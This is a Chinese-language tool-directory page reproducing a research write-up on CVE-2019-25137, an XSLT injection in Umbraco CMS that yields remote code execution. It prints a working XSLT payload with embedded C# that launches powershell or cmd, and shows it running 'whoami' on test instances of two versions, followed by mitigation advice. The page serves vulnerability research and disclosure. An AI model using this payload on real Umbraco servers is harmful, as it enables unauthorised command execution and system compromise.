Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-25137-Version-Research — 一份深入调查 CVE-2019-25137 全部影响范围的技术分析文章。 | Kitploit
工具/GitHubGitHub/ickarah/cve-2019-25137-version-research
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubickarah/cve-2019-25137-version-research

CVE-2019-25137-Version-Research

一份深入调查 CVE-2019-25137 全部影响范围的技术分析文章。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1193年前尚未审核
分享

CVE-2019-25137 受影响版本研究


CVE-2019-25137 概述


CVE-2019-25137 是 Umbraco CMS 中的一个 XSLT 注入漏洞。该漏洞存在于 XSLT(可扩展样式表语言转换)可视化器网页中。此网页的易受攻击 URI 是 /umbraco/developer/Xslt/xsltVisualize.aspx。

成功利用 XSLT 可视化器可导致在目标系统上执行 C# 代码。要利用此漏洞,用户需要拥有 Umbraco CMS 的合法管理员凭据。

CVE-2019-25137 的概念验证使用了 msxsl:script 元素。该元素允许在 XSLT 转换中使用其他编程语言,例如 C#。


<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
	<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "<additional arguments>"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "<Can be powershell or cmd>"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script>
	<xsl:template match="/">
		<xsl:value-of select="csharp_user:xml()"/>
	</xsl:template>
</xsl:stylesheet>

该 XSLT 负载将尝试执行以下 C# 代码。


string cmd = "<additional arguments>"; 
System.Diagnostics.Process proc = new System.Diagnostics.Process(); 
proc.StartInfo.FileName = "<Can be powershell or cmd>"; 
proc.StartInfo.Arguments = cmd; 
proc.StartInfo.UseShellExecute = false; 
proc.StartInfo.RedirectStandardOutput = true;  
proc.Start(); 
string output = proc.StandardOutput.ReadToEnd(); 
return output;

C# 代码分解为以下语句——所有定义均记录在 Microsoft 的网站上。

FunctionOverview
System.Diagnostics.Process proc提供对本地和远程进程的访问,并允许用户启动和停止本地系统进程,此处该进程名为 "proc"。
proc.StartInfo.FileName定义用户想要启动的应用程序名称(powershell 或 cmd)。
proc.StartInfo.Arguments定义 FileName 可能需要的任何附加变量。
proc.StartInfo.UseShellExecute一个指示是否使用操作系统 shell 启动进程的值,由于使用 powershell 或 cmd,此值设置为 false。
proc.StartInfo.RedirectStandardOutput一个指示应用程序的输出是否写入 StandardOutput 流的值,此值设置为 true。
proc.Start()启动 "proc" 进程资源并将其与 Process 组件关联。
string output = proc.StandardOutput.ReadToEnd()对 "proc" 执行同步读取操作,并将其重定向到 "output" 变量。


Umbraco 版本分析

由于 Umbraco 是一个开源 CMS,我从其网站获取了不同的安装版本,以确定哪些新旧版本可能仍存在 xsltVisualize.aspx。



分析表明,xsltVisualize.aspx 文件存在于 Umbraco CMS 4.11.8 至 7.15.10 版本中。该文件和整个 Development 文件夹在 8.0.0 及以上版本中不再存在。




测试 Umbraco 4.11.8

为了证明最早版本也容易受到 CVE-2019-25137 的攻击,我搭建了一个 Umbraco 4.11.8 的测试实例。



将 Umbraco CMS 4.11.8 的 xsltVisualize.aspx 与 Umbraco CMS 7.12.4 版本中的文件进行比较,可以看出虽然存在少量差异,但网页功能是相同的。


要测试该漏洞利用,用户需要在 xsltSelection 字段中提交负载。



使用之前提供的负载,我能够实现远程代码执行,这表明该版本也存在漏洞。下图演示了 whoami 的执行。

<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
	<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "whoami"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script>
	<xsl:template match="/">
		<xsl:value-of select="csharp_user:xml()"/>
	</xsl:template>
</xsl:stylesheet>



测试 Umbraco 7.15.10

为了证明包含 xsltVisualize.aspx 的最新 Umbraco 版本也存在漏洞,我搭建了一个 Umbraco 7.15.10 的测试实例。


将 Umbraco CMS 7.15.10 的 xsltVisualize.aspx 与 Umbraco CMS 7.12.4 版本中的文件进行比较,可以看出它们是相同的。


访问 /umbraco/developer/Xslt/xsltVisualize.aspx URI 表明该文件确实存在。


使用之前提供的相同负载,我再次实现了远程代码执行,这表明该版本也存在漏洞。下图演示了 whoami 的执行。

<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
	<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "whoami"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script>
	<xsl:template match="/">
		<xsl:value-of select="csharp_user:xml()"/>
	</xsl:template>
</xsl:stylesheet>


总结


这些示例表明,CVE-2019-25137 存在于除 7.12.4 之外的 Umbraco 版本中。4.11.8 和 7.15.10 之间的所有版本都包含易受攻击的网页,因此应包含在 CVE 更新中。可以通过移除对 xsltVisualize.aspx 文件的访问或更新到最新版本的 Umbraco 来缓解 CVE-2019-25137。



参考资料

原始 CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25137

Umbraco 发布日期 - https://our.umbraco.com/download/releases/774

Umbraco 版本 - https://our.umbraco.com/download/releases

XSLT 定义 - https://en.wikipedia.org/wiki/XSLT

使用的负载 - https://github.com/noraj/Umbraco-RCE

下载工具